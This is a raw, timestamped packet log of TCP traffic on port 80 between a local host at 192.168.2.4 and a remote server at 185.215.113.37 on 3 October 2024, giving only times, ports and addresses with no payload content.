Oct 3, 2024 18:38:20.764060020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.764075994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.764096022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.764887094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.764940977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.764978886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.764996052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765011072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765026093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765036106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.765042067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765058041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765064955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.765074968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765091896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765104055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.765106916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765124083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765131950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.765141010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765172005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.765208960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.765911102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765927076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765942097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765957117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765968084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.765974045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765990019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.765999079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.766005039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.766021013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.766036034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.766050100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.766051054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.766067982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.766076088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.766099930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.766123056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.766927004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.766963959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.766978979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.766993999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.767009020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.767015934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.767025948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.767040968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.767056942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.767059088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.767072916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.767083883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.767088890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.767106056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.767124891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.767167091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.767992020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768007994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768023014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768038034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768053055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768064976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768070936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768086910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768093109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768104076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768114090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768121958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768137932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768143892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768157005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768193007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768227100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768805981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768822908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768836975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768851995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768862009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768867970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768884897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768886089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768901110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768917084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768929958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768933058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768949986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768955946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.768966913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.768992901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.769028902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.769742966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769758940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769773960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769788027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769803047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769810915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.769820929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769834042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.769836903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769853115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769859076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.769869089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769887924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769902945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.769903898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.769938946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.769963980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.770759106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770787001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770812035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770838976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770840883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.770868063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770876884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.770898104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770914078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.770925999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770946980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.770952940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770981073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.770987034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771008015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771011114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771032095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771038055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771056890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771065950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771085978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771114111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771511078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771539927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771594048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771637917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771667004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771693945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771694899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771723032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771725893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771748066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771752119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771771908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771780014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771810055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771835089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771836996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771864891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771869898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771893978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.771908045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771927118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.771949053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.772742987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772769928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772798061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772824049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772829056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.772850990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772861004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.772880077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772892952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.772908926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772914886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.772936106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.772937059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772958994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.772967100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.772991896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.772994041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773006916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773024082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773046970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773071051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773483038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773509979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773533106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773536921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773554087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773566961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773585081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773596048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773614883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773623943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773643970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773652077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773673058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773680925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773699999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773710012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773727894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773736000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773756027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773766041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.773792028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.773808956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774524927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774569035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774595976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774620056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774624109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774652004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774678946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774678946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774689913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774708986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774713039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774730921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774738073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774756908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774766922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774846077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774871111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774873972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774902105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.774904966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774936914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.774959087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.775739908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.775768042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.775790930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.775794983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.775814056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.775825977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.775842905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.775855064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.775873899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.775882959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.775902033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.775930882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.795248985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.795770884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.832564116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.832633972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.832652092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.832714081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.832748890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.832761049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.832782030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.832809925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.832814932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.832850933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.832899094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.832937002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833025932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833059072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833091974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833092928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833112955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833184004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833219051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833236933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833252907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833254099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833277941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833287001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833298922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833321095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833345890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833358049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833393097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833420038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833808899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833842039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833869934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833894968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833895922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833930969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833950043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833965063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.833980083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.833997965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834028959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834032059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834064960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834096909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834100962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834134102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834134102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834167957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834173918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834188938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834223986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834672928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834723949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834757090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834760904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834780931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834794044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834803104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834829092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834852934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834861994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834897995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834897995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834925890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834933043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834964991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.834984064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.834997892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835016966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835031033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835052013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835084915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835706949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835741043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835763931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835774899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835788965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835808992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835822105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835843086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835860014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835877895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835891008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835913897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835930109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835947990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.835978985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.835982084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836014032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836018085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836047888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836052895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836066961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836129904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836373091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836422920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836528063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836561918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836580038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836596012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836610079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836631060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:20.836646080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:20.836663008 CEST	80	49730	185.215.113.37	192.168.2.4
